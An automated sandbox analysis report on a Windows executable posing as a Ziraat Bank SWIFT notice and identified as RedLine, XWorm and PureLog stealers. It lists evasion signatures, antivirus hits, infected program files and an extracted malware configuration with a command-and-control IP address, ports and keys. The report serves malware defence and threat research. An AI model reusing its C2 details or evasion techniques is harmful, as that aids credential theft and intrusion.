Windows Analysis Report
Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Overview

General Information

Sample name: Ziraat_Bankasi_Swift-Messaji_Notifications.exe
Analysis ID: 1645186
MD5: cddaeb64c402c6127545f151590c5d20
SHA1: f62cfcc6347fdfdbe503daaa6b7cdee1ccb1d0ed
SHA256: 8e8b85ca1b4d5b6d629c758ec683a2530e54fc57e51d273e07e5d4f6f016dc72
Tags: exe, geo, RedLineStealer, TUR, ZiraatBank, user-abuse_ch

Detection

PureLog Stealer, RedLine, XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected XWorm
Adds a directory exclusion to Windows Defender
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to behave differently if executed on a Russian/Kazakh computer
Creates files in the system32 config directory
Drops VBS files to the startup folder
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to many different domains
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Classification chart axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: XWorm
Description: Malware with a wide range of capabilities, ranging from RAT to ransomware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Avira: detected
Source: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280hv Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": ["204.10.161.147:7082"], "Bot Id": "success", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["204.10.161.147"], "Port": 7081, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Virustotal: Detection: 79%
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe ReversingLabs: Detection: 86%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp String decryptor: 204.10.161.147
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp String decryptor: 7081
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp String decryptor: <123456789>
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp String decryptor: <Xwormmm>
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp String decryptor: XWorm V5.6
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp String decryptor: USB.exe
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp String decryptor: %AppData%
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp String decryptor: XClient.exe
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253422637.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdb source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1539403931.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2427700205.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdbL source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdb source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: RegSvcs.exe, 00000013.00000002.1452607862.0000000003085000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: crashreporter.pdb source: alg.exe, 00000002.00000003.2007802565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MsSense.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MsSense.pdb source: elevation_service.exe, 0000000C.00000003.2490180834.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: locator.pdb source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1552275013.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1399996879.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.1762060160.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1752773778.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1751658354.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000013.00000002.1440773629.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1440737342.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1391363557.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.1823198394.0000000001530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1817693971.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1671146289.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2444651718.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.1795445513.0000000001500000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerfHost.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.1649365761.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdbP source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbL" source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerfHost.pdb source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000A.00000002.2603046672.0000000006620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: locator.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp

Spreading

Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\Locator.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7z.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe System file written: C:\Windows\System32\AppVClient.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\msiexec.exe
